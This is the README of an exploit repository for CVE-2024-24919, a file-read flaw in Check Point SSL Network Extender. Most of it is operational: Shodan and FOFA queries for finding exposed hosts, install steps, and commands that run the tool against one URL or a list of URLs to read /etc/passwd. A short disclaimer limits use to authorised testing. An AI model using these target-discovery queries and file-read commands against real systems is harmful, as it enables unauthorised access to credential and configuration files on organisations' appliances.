gurudattch/CVE-2024-24919

CVE-2024-24919 Exploit

CVE Identifier: CVE-2024-24919
Vulnerability Type: Local File Inclusion (LFI)
Severity: High
CVSS Score: 7.5 (High)

Overview:

CVE-2024-24919 is a Local File Inclusion (LFI) vulnerability present in certain web applications. This vulnerability allows an attacker to read files from the server by manipulating the file path input parameter. By exploiting this flaw, an attacker can gain access to sensitive files on the server, such as configuration files, password files, and other critical data, leading to information disclosure and potential further compromise.

Affected Software:

Check Point SSL Network Extender

Queries to find vulnerable hosts

  1. Shodan "Server: Check Point SVN"
  2. fofa title=="Check Point SSL Network Extender"

Usage

Install the exploit:

git clone https://github.com/gurudattch/CVE-2024-24919

Install the requirements:

pip install -r requirments.txt

Check a Single URL

To check a single URL for the vulnerability:

python cve-2024-24919.py -u "http://example.com" -d "/etc/passwd"

Check Multiple URLs from a File

python cve-2024-24919.py -f "urls.txt" -d "/etc/passwd"

Arguments

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Single URL to check for vulnerability
  -f FILE, --file FILE  File containing multiple URLs to check
  -d DATA, --data DATA  Data to send in the request (eg. /etc/passwd)
  -r {y,n}, --response {y,n}
                        Print Response Or Not

Disclaimer

This script is intended for educational purposes and should only be used to test systems you own or have permission to test. Unauthorized use of this script against systems without permission is illegal.
